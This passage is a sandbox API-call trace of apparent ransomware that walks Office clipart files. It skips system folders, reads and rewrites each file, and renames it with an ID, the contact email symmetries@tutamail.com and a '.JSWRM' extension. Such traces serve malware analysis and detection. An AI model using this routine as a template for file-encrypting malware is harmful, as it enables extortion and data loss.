[0097.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0097.198] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2566, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01777_.WMF", cAlternateFileName="")) returned 1 [0097.198] lstrcmpiW (lpString1="SO01777_.WMF", lpString2=".") returned 1 [0097.198] lstrcmpiW (lpString1="SO01777_.WMF", lpString2="..") returned 1 [0097.198] lstrcmpiW (lpString1="SO01777_.WMF", lpString2="...") returned 1 [0097.198] lstrcmpiW (lpString1="SO01777_.WMF", lpString2="windows") returned -1 [0097.198] lstrcmpiW (lpString1="SO01777_.WMF", lpString2="recovery") returned 1 [0097.198] lstrcmpiW (lpString1="SO01777_.WMF", lpString2="perflogs") returned 1 [0097.198] lstrcmpiW (lpString1="SO01777_.WMF", lpString2="documents and settings") returned 1 [0097.198] lstrcmpiW (lpString1="SO01777_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.199] lstrcmpiW (lpString1="SO01777_.WMF", lpString2="system volume information") returned -1 [0097.199] lstrcmpiW (lpString1="SO01777_.WMF", lpString2="msocache") returned 1 [0097.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0097.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01777_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01777_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01777_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0097.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0097.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01777_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01777_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01777_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0097.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0097.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0097.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0097.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01777_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01777_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.200] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9574) returned 1 [0097.200] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2560) returned 0x24d210 [0097.201] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2560, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2560, lpOverlapped=0x0) returned 1 [0097.203] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.203] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2560, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2560, lpOverlapped=0x0) returned 1 [0097.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.203] CloseHandle (hObject=0x314) returned 1 [0097.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0097.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0097.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0097.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0097.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0097.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0097.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.203] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01777_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01777_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01777_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01777_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0097.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0097.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0097.204] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6ca8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01785_.WMF", cAlternateFileName="")) returned 1 [0097.204] lstrcmpiW (lpString1="SO01785_.WMF", lpString2=".") returned 1 [0097.204] lstrcmpiW (lpString1="SO01785_.WMF", lpString2="..") returned 1 [0097.204] lstrcmpiW (lpString1="SO01785_.WMF", lpString2="...") returned 1 [0097.204] lstrcmpiW (lpString1="SO01785_.WMF", lpString2="windows") returned -1 [0097.204] lstrcmpiW (lpString1="SO01785_.WMF", lpString2="recovery") returned 1 [0097.204] lstrcmpiW (lpString1="SO01785_.WMF", lpString2="perflogs") returned 1 [0097.204] lstrcmpiW (lpString1="SO01785_.WMF", lpString2="documents and settings") returned 1 [0097.204] lstrcmpiW (lpString1="SO01785_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.204] lstrcmpiW (lpString1="SO01785_.WMF", lpString2="system volume information") returned -1 [0097.205] lstrcmpiW (lpString1="SO01785_.WMF", lpString2="msocache") returned 1 [0097.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0097.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01785_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01785_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01785_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0097.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0097.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01785_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01785_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01785_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0097.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0097.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0097.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0097.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01785_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01785_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.205] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27816) returned 1 [0097.205] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6ca0) returned 0x24d210 [0097.206] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6ca0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6ca0, lpOverlapped=0x0) returned 1 [0097.245] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.245] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6ca0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6ca0, lpOverlapped=0x0) returned 1 [0097.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.246] CloseHandle (hObject=0x314) returned 1 [0097.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0097.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0097.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0097.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0097.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0097.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0097.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.247] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01785_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01785_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01785_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01785_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0097.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0097.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0097.248] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1088, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01805_.WMF", cAlternateFileName="")) returned 1 [0097.248] lstrcmpiW (lpString1="SO01805_.WMF", lpString2=".") returned 1 [0097.248] lstrcmpiW (lpString1="SO01805_.WMF", lpString2="..") returned 1 [0097.248] lstrcmpiW (lpString1="SO01805_.WMF", lpString2="...") returned 1 [0097.248] lstrcmpiW (lpString1="SO01805_.WMF", lpString2="windows") returned -1 [0097.248] lstrcmpiW (lpString1="SO01805_.WMF", lpString2="recovery") returned 1 [0097.248] lstrcmpiW (lpString1="SO01805_.WMF", lpString2="perflogs") returned 1 [0097.248] lstrcmpiW (lpString1="SO01805_.WMF", lpString2="documents and settings") returned 1 [0097.248] lstrcmpiW (lpString1="SO01805_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.248] lstrcmpiW (lpString1="SO01805_.WMF", lpString2="system volume information") returned -1 [0097.249] lstrcmpiW (lpString1="SO01805_.WMF", lpString2="msocache") returned 1 [0097.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0097.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01805_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01805_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01805_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0097.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0097.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01805_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01805_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01805_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0097.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0097.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0097.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0097.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01805_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01805_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.250] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4232) returned 1 [0097.250] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1080) returned 0x23fc98 [0097.250] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1080, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1080, lpOverlapped=0x0) returned 1 [0097.252] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.252] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1080, lpOverlapped=0x0) returned 1 [0097.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0097.252] CloseHandle (hObject=0x314) returned 1 [0097.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0097.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0097.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0097.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0097.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0097.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0097.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0097.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0097.252] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01805_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01805_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01805_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01805_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0097.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0097.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0097.253] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x578, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01905_.WMF", cAlternateFileName="")) returned 1 [0097.254] lstrcmpiW (lpString1="SO01905_.WMF", lpString2=".") returned 1 [0097.254] lstrcmpiW (lpString1="SO01905_.WMF", lpString2="..") returned 1 [0097.254] lstrcmpiW (lpString1="SO01905_.WMF", lpString2="...") returned 1 [0097.254] lstrcmpiW (lpString1="SO01905_.WMF", lpString2="windows") returned -1 [0097.254] lstrcmpiW (lpString1="SO01905_.WMF", lpString2="recovery") returned 1 [0097.254] lstrcmpiW (lpString1="SO01905_.WMF", lpString2="perflogs") returned 1 [0097.254] lstrcmpiW (lpString1="SO01905_.WMF", lpString2="documents and settings") returned 1 [0097.254] lstrcmpiW (lpString1="SO01905_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.254] lstrcmpiW (lpString1="SO01905_.WMF", lpString2="system volume information") returned -1 [0097.254] lstrcmpiW (lpString1="SO01905_.WMF", lpString2="msocache") returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0097.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01905_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01905_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01905_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.254] HeapFree (in: hHeap=0x1e0000, 